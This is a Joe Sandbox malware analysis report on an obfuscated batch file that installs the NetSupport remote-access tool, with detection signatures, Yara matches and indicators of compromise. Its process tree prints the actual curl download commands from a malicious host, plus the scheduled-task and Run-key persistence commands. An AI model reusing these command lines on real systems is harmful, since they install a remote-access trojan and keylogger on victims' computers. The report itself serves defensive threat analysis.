Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tUUPQygorhzFkIcHuB.bat

Overview

General Information

Sample Name:tUUPQygorhzFkIcHuB.bat
Analysis ID:1275250
MD5:d915e6d4a7e64a25bfe1717ac1f5b501
SHA1:06e40f582d31d9d1b9d7817e26fd348859700800
SHA256:6054f328f8d54d0a54f5e3b90cff020e139105eb5aa5a3be52c29dbea6289c30
Tags:1BATSTARTER5-252-178-48batnetsupportponraj-comrat
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Command shell drops VBS files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Potential key logger detected (key state polling based)
Uses reg.exe to modify the Windows registry
Enables security privileges
Found evaded block containing many API calls
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7076 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tUUPQygorhzFkIcHuB.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 7164 cmdline: cmd.exe /c C:\ProgramData\sett.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • curl.exe (PID: 7160 cmdline: curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z" -o "C:\ProgramData\lol.7z" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • cmd.exe (PID: 4048 cmdline: cmd.exe /c C:\ProgramData\7z.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • curl.exe (PID: 2944 cmdline: curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • cmd.exe (PID: 5632 cmdline: cmd.exe /c C:\ProgramData\2.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • curl.exe (PID: 4756 cmdline: curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat" -o "C:\ProgramData\2.bat" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • cmd.exe (PID: 4712 cmdline: cmd.exe /c C:\ProgramData\2.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • xcopy.exe (PID: 4700 cmdline: xcopy /h /y 7zz.exe C:\ProgramData\ MD5: 6BC7DB1465BEB7607CBCBD7F64007219)
      • xcopy.exe (PID: 6664 cmdline: xcopy /h /y lol.7z C:\ProgramData\ MD5: 6BC7DB1465BEB7607CBCBD7F64007219)
      • cmd.exe (PID: 6784 cmdline: cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\ MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • 7zz.exe (PID: 5692 cmdline: C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\ MD5: 42BADC1D2F03A8B1E4875740D3D49336)
      • timeout.exe (PID: 7136 cmdline: TIMEOUT /T 3 MD5: EB9A65078396FB5D4E3813BB9198CB18)
      • schtasks.exe (PID: 1436 cmdline: SCHTASKS /create /F /tn "KAVAQQQ" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 4 /sd 01/01/2022 /st 00:00 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 4588 cmdline: cmd /c C:\ProgramData\client32.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • client32.exe (PID: 5792 cmdline: C:\ProgramData\client32.exe MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
      • reg.exe (PID: 5780 cmdline: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 6768 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "KAVAS" /t REG_SZ /d "C:\ProgramData\client32.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)
  • cmd.exe (PID: 7148 cmdline: cmd.exe /c C:\ProgramData\client32.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • client32.exe (PID: 5592 cmdline: C:\ProgramData\client32.exe MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
  • client32.exe (PID: 5660 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
  • client32.exe (PID: 4712 cmdline: "C:\ProgramData\client32.exe" MD5: F70B67C2B3204B7DDD8B755799CCCFF0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
tUUPQygorhzFkIcHuB.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5a:$s2: :~2,1%%
  • 0x65:$s2: :~39,1%%
  • 0x71:$s2: :~40,1%%
  • 0x7d:$s2: :~33,1%%
  • 0x89:$s2: :~31,1%
  • 0x96:$s2: :~36,1%%
  • 0xa2:$s2: :~22,1%
  • 0xb0:$s2: :~31,1%%
  • 0xbc:$s2: :~47,1%%
  • 0xc8:$s2: :~57,1%%
  • 0xd4:$s2: :~56,1%%
  • 0xe0:$s2: :~35,1%%
  • 0xec:$s2: :~37,1%%
  • 0xf8:$s2: :~55,1%%
  • 0x104:$s2: :~10,1%%
  • 0x110:$s2: :~17,1%%
  • 0x11c:$s2: :~14,1%%
  • 0x128:$s2: :~1,1%%
  • 0x133:$s2: :~62,1%%
  • 0x13f:$s2: :~39,1%%

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\ProgramData\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\ProgramData\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000010.00000000.406057046.00000000011E2000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000010.00000002.654634382.000000000350F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 33 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      21.2.client32.exe.72b30000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        24.2.client32.exe.6dae0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          24.2.client32.exe.111b8c68.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                            24.2.client32.exe.111b8c68.2.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              21.0.client32.exe.11e0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 40 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Snort Signatures

                                No Snort rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z:Avira URL Cloud: Label: malware
                                Source: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exeAvira URL Cloud: Label: malware
                                Source: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.batAvira URL Cloud: Label: malware
                                Source: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z-oC:Avira URL Cloud: Label: malware
                                Source: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-oC:Avira URL Cloud: Label: malware
                                Source: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat-oC:Avira URL Cloud: Label: malware
                                Source: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7zAvira URL Cloud: Label: malware
                                Multi AV Scanner detection for domain / URL
                                Source: ponraj.comVirustotal: Detection: 10%Perma Link
                                Source: C:\ProgramData\7zz.exeFile opened: C:\ProgramData\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 188.127.225.160:443 -> 192.168.2.5:49720 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.225.160:443 -> 192.168.2.5:49721 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.225.160:443 -> 192.168.2.5:49722 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658246695.000000006C191000.00000020.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000002.412621307.000000006C191000.00000020.00000001.01000000.00000008.sdmp, client32.exe, 00000018.00000002.433970955.000000006C191000.00000020.00000001.01000000.00000008.sdmp, client32.exe, 00000019.00000002.451224635.000000006C191000.00000020.00000001.01000000.00000008.sdmp, msvcr100.dll.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000000.406057046.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000010.00000002.654110401.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000015.00000000.410473552.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000015.00000002.411812182.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000018.00000000.431953663.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000018.00000002.433418912.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000019.00000000.449712542.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000019.00000002.450737079.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658456410.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000015.00000002.412805633.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000018.00000002.434145253.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000019.00000002.451350429.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, PCICHEK.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658393116.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000015.00000002.412768242.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000018.00000002.434111842.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000019.00000002.451325130.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, pcicapi.dll.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.dr
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,13_2_0040B174
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 188.127.225.160 188.127.225.160
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.252.178.48
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.252.178.48
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.252.178.48
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.drString found in binary or memory: http://%s/testpage.htm
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://127.0.0.1
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                Source: client32.exe, 00000010.00000003.409709051.0000000005D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/
                                Source: client32.exe, 00000010.00000003.408513986.0000000005CF6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000010.00000003.409709051.0000000005D2A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411090507.0000000005D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspN
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000010.00000003.407845110.0000000005D1C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.408015163.0000000005D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspYL
                                Source: client32.exe, 00000010.00000003.412099334.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.416938121.0000000005CFD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.409709051.0000000005D2A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411970326.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.415126144.0000000005D20000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.415864969.0000000005CFD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411806687.0000000005D1F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.416851707.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.413186651.0000000005CF0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411090507.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.655064090.0000000005D1C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.413747709.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.412310764.0000000005CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspsLV
                                Source: client32.exe, 00000010.00000003.409709051.0000000005D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/og
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://ocsp.comodoca.com0
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: http://ocsp.sectigo.com0
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: http://s2.symcb.com0
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://sf.symcd.com0&
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: http://sv.symcd.com0&
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
